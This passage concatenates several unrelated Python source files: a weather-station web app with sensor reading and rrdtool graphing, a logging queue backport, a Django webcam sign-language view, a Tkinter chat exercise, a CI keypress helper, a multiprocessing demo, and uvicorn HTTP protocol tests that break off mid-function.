self.__humidity = sensor.read()
self.__humidity = int(self.__humidity.strip())
self.__last_hum_update = now
break
except IOError, err:
pass
time.sleep(1)
if now - self.__last_temp_update > self.__update_time_out:
for attempt in xrange(0,3):
try:
if os.path.isfile(self.__sensor_path + '/in_temp_input'):
with open(self.__sensor_path + '/in_temp_input') as sensor:
self.__temperature = sensor.read()
self.__temperature = int(self.__temperature.strip())
self.__last_temp_update = now
break
except IOError, err:
pass
time.sleep(1)
def get_temperature(self):
self.__update()
return float(self.__temperature) / 1000
def get_humidity(self):
self.__update()
return float(self.__humidity) / 1000
class CHIPWeatherStationDatabase():
def __init__(self,config):
self.__config = config
self.__data_file = 'data.rrd'
if not os.path.isfile(self.__data_file):
self.__create_rrd_database()
def __create_rrd_database(self):
rrdtool.create( self.__data_file,
'--start', 'N',
'--step', '60',
'DS:cputemp:GAUGE:600:U:U',
'DS:temp:GAUGE:600:U:U',
'DS:humidity:GAUGE:600:U:U',
'RRA:AVERAGE:0.5:1:' + str( 60 * 24 ),
'RRA:MIN:0.5:1:' + str( 60 * 24 ),
'RRA:MAX:0.5:1:' + str( 60 * 24 ),
'RRA:AVERAGE:0.5:60:168',
'RRA:MIN:0.5:60:168',
'RRA:MAX:0.5:60:168',
'RRA:AVERAGE:0.5:' + str( 60 * 24 ) + ':365',
'RRA:MIN:0.5:' + str( 60 * 24 ) + ':365',
'RRA:MAX:0.5:' + str( 60 * 24 ) + ':365')
def update(self, cputemp, temp, humidity):
try:
ret = rrdtool.update(self.__data_file, 'N:%s:%s:%s' % (cputemp,
temp,
humidity));
except Exception, err:
pass
def create_graphs(self):
for sched in ['daily' , 'weekly', 'monthly']:
if sched == 'weekly':
period = 'w'
elif sched == 'daily':
period = 'd'
elif sched == 'monthly':
period = 'm'
ret = rrdtool.graph('web/%s.png' %(sched),
'--slope-mode',
'--start',
'-1%s' %(period),
'--title=CHIP Weather Station %s graph' % sched,
'--vertical-label=Measurement',
'--watermark=Dongle ID %s, software version %s, last update %s' % (self.__config.get_uuid(),
self.__config.get_version(),
datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')),
'-w 500',
'-h 150',
'-A',
'--border=0',
'--color=BACK#000000',
'--color=CANVAS#FFFFFF20',
'--color=GRID#FFFFFF20',
'--color=MGRID#adadad',
'--color=FONT#FFFFFF',
'--color=FRAME#FFFFFF20',
'--color=ARROW#FFFFFF',
'COMMENT:' + '{:<30}'.format(''),
'COMMENT:' + '{:<10}'.format('Current'),
'COMMENT:' + '{:<10}'.format('Maximum'),
'COMMENT:' + '{:<10}'.format('Average'),
'COMMENT:Minimum\l',
'DEF:Humidity=' + self.__data_file + ':humidity:AVERAGE',
'AREA:Humidity#0000FF60:' + '{:<28}'.format('Humidity in %'),
'LINE2:Humidity#0000FF',
'GPRINT:Humidity:LAST:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:MAX:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:AVERAGE:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:MIN:%6.2lf%%\l',
'DEF:Temperature=' + self.__data_file + ':temp:AVERAGE',
'LINE2:Temperature#00FF0080:' + '{:<28}'.format('Temperature in C'),
'GPRINT:Temperature:LAST:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:MAX:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:AVERAGE:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:MIN:%6.2lfC\l',
'DEF:CPUTemperature=' + self.__data_file + ':cputemp:AVERAGE',
'LINE2:CPUTemperature#FF000080:' + '{:<28}'.format('CPU Temperature in C'),
'GPRINT:CPUTemperature:LAST:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:MAX:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:AVERAGE:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:MIN:%6.2lfC\l'
)
class CHIPWeatherStationEngine():
def __init__(self):
self.__config = CHIPWeatherStationConfig()
self.__database = CHIPWeatherStationDatabase(self.__config)
self.__temp_hum_sensor = CHIPWeatherStationSensor()
self.__cpu_sensor = CHIPWeatherStationCPUSensor()
self.__status_led = CHIPWeatherStationLEDIndicator(self.__config.get_led_pin())
self.__ip = CHIPWeatherStationUtils.get_ip_number()
self.__engine = Thread(target = self.__engine_loop,)
self.__engine.daemon = True
self.__engine.start()
self.__sensor_scan_progress = None
# self.scan_sensors()
def __engine_loop(self):
while True:
self.__status_led.on()
self.__database.update(self.__cpu_sensor.get_temperature(),
self.__temp_hum_sensor.get_temperature(),
self.__temp_hum_sensor.get_humidity())
self.__database.create_graphs()
self.__status_led.off()
print 'Done updating. CPU: %f, Temp: %f, Humidity: %f. Scan process %f%%. Next update in 30 seconds' % (self.__cpu_sensor.get_temperature(),
self.__temp_hum_sensor.get_temperature(),
self.__temp_hum_sensor.get_humidity(),
self.get_scan_status())
time.sleep(30)
def __scan_sensors(self):
iplist = CHIPWeatherStationUtils.get_network_ip_numbers()
counter = 0.0
total = float(len(iplist))
self.__sensor_scan_progress = 0.0
print 'Start sensor scanning (%s) ...' % total
pool = multiprocessing.Pool(10)
for device in pool.imap_unordered(check_device, iplist):
counter += 1.0
self.__sensor_scan_progress = (counter / total ) * 100
if device is not None:
print device
self.__sensor_scan_progress = None
def scan_sensors(self):
if not self.is_scanning():
timeout = 3
socket.setdefaulttimeout(timeout)
Thread(target=self.__scan_sensors).start()
def get_scan_status(self):
return self.__sensor_scan_progress if self.__sensor_scan_progress is not None else -1
def get_uuid(self):
return self.__config.get_uuid()
def get_version(self):
return self.__config.get_version()
def get_name(self):
return self.__config.get_name()
def get_ip_number(self):
return self.__ip
def get_temperature(self):
return self.__temp_hum_sensor.get_temperature()
def get_humidity(self):
return self.__temp_hum_sensor.get_humidity()
def is_scanning(self):
return self.get_scan_status() >= 0.0;
def cleanup(self):
print 'Cleanup....'
self.__status_led.off()
self.__status_led.close()
class CHIPWeatherStationWebServer(Bottle):
def __init__(self, host = '::', port = 8080):
self.__engine = CHIPWeatherStationEngine()
self.__host = host
self.__port = port
self.__set_routes()
def __api_call(self,url):
if 'info' == url:
return {'uuid' : self.__engine.get_uuid(),
'name' : self.__engine.get_name(),
'ip': self.__engine.get_ip_number(),
'scanning' : self.__engine.is_scanning(),
'uptime': 0,
'version' : self.__engine.get_version()}
elif 'temperature' == url:
return {'uuid' : self.__engine.get_uuid(),
'value' : self.__engine.get_temperature()}
elif 'humidity' == url:
return {'uuid' : self.__engine.get_uuid(),
'value' : self.__engine.get_humidity()}
def __set_routes(self):
@route('/')
def index():
return '<meta http-equiv="refresh" content="0;index.html"/>'
@route('/api/<url:path>')
def callback(url):
response.set_header('Access-Control-Allow-Origin', '*')
return self.__api_call(url)
@route('/<path:re:.*>')
def callback(path):
return static_file(path,root='web')
def cleanup(self):
self.__engine.cleanup()
def start_server(self):
run(host=self.__host,
port=self.__port,
debug=True,
reloader=False,
quiet=False)
if __name__ == "__main__":
CHIPWeatherStation = CHIPWeatherStationWebServer()
try:
CHIPWeatherStation.start_server()
except KeyboardInterrupt:
print 'KILL KILL KILL'
finally:
CHIPWeatherStation.cleanup()
|
queue.py
|
#
# Copyright (C) 2010-2017 Vinay Sajip. See LICENSE.txt for details.
#
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
:param record: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers, **kwargs):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = kwargs.get('respect_handler_level', False)
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
views.py
|
from django.shortcuts import render
from django.views.decorators import gzip
from django.http import StreamingHttpResponse
import cv2
import numpy as np
import threading
import tensorflow as tf
@gzip.gzip_page
def Home(request):
return render(request, 'index.html')
class VideoCamera(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
(self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
self.model = tf.keras.models.load_model('sign_language.h5')
def __del__(self):
self.video.release()
def get_frame(self):
image = self.frame
# print(image.shape)
_, jpeg = cv2.imencode('.jpg', image)
ri = cv2.resize(cv2.cvtColor(image, cv2.COLOR_BGR2GRAY), (28,28))
ri = np.expand_dims(ri, axis = (0,3))
out = self.model.predict(ri)
out = out.astype('uint8')
# print(out)
return jpeg.tobytes(),out
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
# Camera Object
cam = VideoCamera()
def test_stream(request):
try:
# cam = VideoCamera()
return StreamingHttpResponse(generateImage(cam), content_type="multipart/x-mixed-replace;boundary=frame")
except:
pass
def stream_response(request):
yield "%s\n" % "A"
def text_stream(request):
# cam = VideoCamera()
resp = StreamingHttpResponse(predictSign(cam), content_type="multipart/x-mixed-replace;boundary=frame")
return resp
# Returns Image to html
def generateImage(camera):
while True:
frame,out = camera.get_frame()
yield "<html><body>\n"
yield "<div>%s</div>\n" % out
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
yield "</body></html>\n"
# Returns Predicted Handsign
def predictSign(camera):
while True:
frame,out = camera.get_frame()
listt = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y"]
# print(len(out[0]),len(listt))
if(1 not in out[0]):
yield ""
else:
yield "%s\n" % listt[list(out[0]).index(1)]
|
16.8.1.py
|
#!/usr/bin/env python
# encoding: UTF-8
"""Exercise answer 16.8.1 for chapter 16."""
__author__ = 'Ibuki Suika'
from Tkinter import *
from ttk import *
from socket import *
from select import select
from threading import Thread
from time import ctime
class App(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.master.title('Python版聊天程式')
self.frm1 = Frame()
self.frm1.pack(fill=BOTH)
self.frm2 = Frame()
self.frm2.pack(side=BOTTOM, fill=X)
self.txt = Listbox(self.frm1, width=100, height=20)
self.txt.pack(side=LEFT, fill=X)
self.bar = Scrollbar(self.frm1)
self.bar.pack(side=RIGHT, fill=Y)
self.txt['yscrollcommand'] = self.bar.set
self.bar['command'] = self.txt.yview
self. lbl = Label(self.frm2, text='待发送:')
self.lbl.pack(side=LEFT)
self.content = StringVar()
self.entry = Entry(self.frm2, width=80, textvariable=self.content)
self.entry.pack(side=LEFT)
self.btn = Button(self.frm2, text='发送', command=self.send_msg)
self.btn.pack(side=LEFT)
def send_msg(self):
pass
class ServerApp(App):
def __init__(self, host, port):
App.__init__(self)
self.server = socket(AF_INET, SOCK_STREAM)
self.server.setblocking(False)
self.server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server.bind((host, port))
self.server.listen(1)
self.inputs = [self.server]
t = Thread(target=self.server_loop)
t.setDaemon(True)
t.start()
def __del__(self):
self.conn.close()
def send_msg(self):
s = self.content.get()
self.txt.insert(END, '[%s] me:' % ctime())
self.txt.insert(END, s)
self.content.set('')
if len(self.inputs) == 2:
self.inputs[1].send(s)
def server_loop(self):
while True:
readers, writers, exceptions = select(self.inputs, [], [])
for reader in readers:
if reader is self.server:
conn, addr = reader.accept()
conn.setblocking(False)
self.inputs.append(conn)
else:
data = reader.recv(1024)
if data:
self.txt.insert(END, '[%s] stranger:' % ctime())
self.txt.insert(END, data)
else:
self.inputs.remove(reader)
if __name__ == '__main__':
app = ServerApp('', 50007)
app.mainloop()
|
install_mikeros_tools_and_press_enter.py
|
# https://stackoverflow.com/a/23468236
# NOTE: THIS SCRIPT SHOULD ONLY BE USED IN APPVEYOR
# Using it anywhere else is just pointless
# This script simulates keypresses to bypass Mikero's stupid unskippable popup window
# (the one about the 1024 characters limit)
# If you're Mikero and you're reading this, then I'm sorry but it's stupid that there
# is no switch to turn it off.
# Yes I know that the paid tools don't have this limitation but I'm quite sure that
# I'm not allowed to just let those tools be widely accessible to anyone looking at
# the build log
import ctypes
import multiprocessing
import time
import install_mikeros_tools
SendInput = ctypes.windll.user32.SendInput
# C struct redefinitions
PUL = ctypes.POINTER(ctypes.c_ulong)
class KeyBdInput(ctypes.Structure):
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time",ctypes.c_ulong),
("dwExtraInfo", PUL)]
class Input_I(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
_fields_ = [("type", ctypes.c_ulong),
("ii", Input_I)]
# Actuals Functions
def PressKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, hexKeyCode, 0x0008, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
def ReleaseKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, hexKeyCode, 0x0008 | 0x0002, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
# directx scan codes http://www.gamespp.com/directx/directInputKeyboardScanCodes.html
if __name__ == '__main__':
multiprocessing.freeze_support()
p = multiprocessing.Process(target=install_mikeros_tools.main, args=())
p.start()
while (p.is_alive()):
PressKey(0x1C)
time.sleep(0.1)
ReleaseKey(0x1C)
time.sleep(1)
|
MultiProcessDaemon.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print('Starting:',p.name, p.pid)
sys.stdout.flush()
time.sleep(2)
print('Exiting:', p.name, p.pid)
sys.stdout.flush()
return
def non_daemon():
p = multiprocessing.current_process()
print('Starting:',p.name,p.pid)
sys.stdout.flush()
print('Exiting:',p.name,p.pid)
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(
name='daemon',target=daemon)
d.daemon=True
n = multiprocessing.Process(
name='non-daemon', target=non_daemon)
n.daemon=False
d.start()
time.sleep(1)
n.start()
|
test_http.py
|
import asyncio
import contextlib
import logging
import socket
import threading
import time
import pytest
from tests.response import Response
from uvicorn import Server
from uvicorn.config import Config
from uvicorn.main import ServerState
from uvicorn.protocols.http.h11_impl import H11Protocol
try:
from uvicorn.protocols.http.httptools_impl import HttpToolsProtocol
except ImportError: # pragma: nocover
HttpToolsProtocol = None
HTTP_PROTOCOLS = [p for p in [H11Protocol, HttpToolsProtocol] if p is not None]
SIMPLE_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_HEAD_REQUEST = b"\r\n".join([b"HEAD / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
LARGE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: text/plain",
b"Content-Length: 100000",
b"",
b"x" * 100000,
]
)
START_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b"",
]
)
FINISH_POST_REQUEST = b'{"hello": "world"}'
HTTP10_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.0", b"Host: example.org", b"", b""])
GET_REQUEST_WITH_RAW_PATH = b"\r\n".join(
[b"GET /one%2Ftwo HTTP/1.1", b"Host: example.org", b"", b""]
)
UPGRADE_REQUEST = b"\r\n".join(
[
b"GET / HTTP/1.1",
b"Host: example.org",
b"Connection: upgrade",
b"Upgrade: websocket",
b"Sec-WebSocket-Version: 11",
b"",
b"",
]
)
INVALID_REQUEST_TEMPLATE = b"\r\n".join(
[
b"%s",
b"Host: example.org",
b"",
b"",
]
)
class MockTransport:
def __init__(self, sockname=None, peername=None, sslcontext=False):
self.sockname = ("127.0.0.1", 8000) if sockname is None else sockname
self.peername = ("127.0.0.1", 8001) if peername is None else peername
self.sslcontext = sslcontext
self.closed = False
self.buffer = b""
self.read_paused = False
def get_extra_info(self, key):
return {
"sockname": self.sockname,
"peername": self.peername,
"sslcontext": self.sslcontext,
}.get(key)
def write(self, data):
assert not self.closed
self.buffer += data
def close(self):
assert not self.closed
self.closed = True
def pause_reading(self):
self.read_paused = True
def resume_reading(self):
self.read_paused = False
def is_closing(self):
return self.closed
def clear_buffer(self):
self.buffer = b""
def set_protocol(self, protocol):
pass
class MockLoop(asyncio.AbstractEventLoop):
def __init__(self, event_loop):
self.tasks = []
self.later = []
self.loop = event_loop
def is_running(self):
return True # pragma: no cover
def create_task(self, coroutine):
self.tasks.insert(0, coroutine)
return MockTask()
def call_later(self, delay, callback, *args):
self.later.insert(0, (delay, callback, args))
def run_one(self):
coroutine = self.tasks.pop()
self.run_until_complete(coroutine)
def run_until_complete(self, coroutine):
asyncio._set_running_loop(None)
try:
return self.loop.run_until_complete(coroutine)
finally:
asyncio._set_running_loop(self)
def close(self):
self.loop.close()
def run_later(self, with_delay):
later = []
for delay, callback, args in self.later:
if with_delay >= delay:
callback(*args)
else:
later.append((delay, callback, args))
self.later = later
class MockTask:
def add_done_callback(self, callback):
pass
@contextlib.contextmanager
def get_connected_protocol(app, protocol_cls, event_loop, **kwargs):
loop = MockLoop(event_loop)
asyncio._set_running_loop(loop)
transport = MockTransport()
config = Config(app=app, **kwargs)
server_state = ServerState()
protocol = protocol_cls(config=config, server_state=server_state, _loop=loop)
protocol.connection_made(transport)
try:
yield protocol
finally:
protocol.loop.close()
asyncio._set_running_loop(None)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_get_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
@pytest.mark.parametrize("path", ["/", "/?foo", "/?foo=bar", "/?foo=bar&baz=1"])
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_request_logging(path, protocol_cls, caplog, event_loop):
get_request_with_query_string = b"\r\n".join(
["GET {} HTTP/1.1".format(path).encode("ascii"), b"Host: example.org", b"", b""]
)
caplog.set_level(logging.INFO, logger="uvicorn.access")
logging.getLogger("uvicorn.access").propagate = True
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, log_config=None
) as protocol:
protocol.data_received(get_request_with_query_string)
protocol.loop.run_one()
assert '"GET {} HTTP/1.1" 200'.format(path) in caplog.records[0].message
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_head_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" not in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_post_request(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive_timeout(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=1)
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=5)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_close(protocol_cls, event_loop):
app = Response(b"", status_code=204, headers={"connection": "close"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"0\r\n\r\n" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_empty_body(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.buffer.count(b"0\r\n\r\n") == 1
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_head_request(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_pipelined_requests(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_undersized_request(protocol_cls, event_loop):
app = Response(b"xxx", headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_oversized_request(protocol_cls, event_loop):
app = Response(b"xxx" * 20, headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_large_post_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(LARGE_POST_REQUEST)
assert protocol.transport.read_paused
protocol.loop.run_one()
assert not protocol.transport.read_paused
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(b"x" * 100000)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_app_exception(protocol_cls, event_loop):
async def app(scope, receive, send):
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_exception_during_response(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"1", "more_body": True})
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_no_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
pass
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
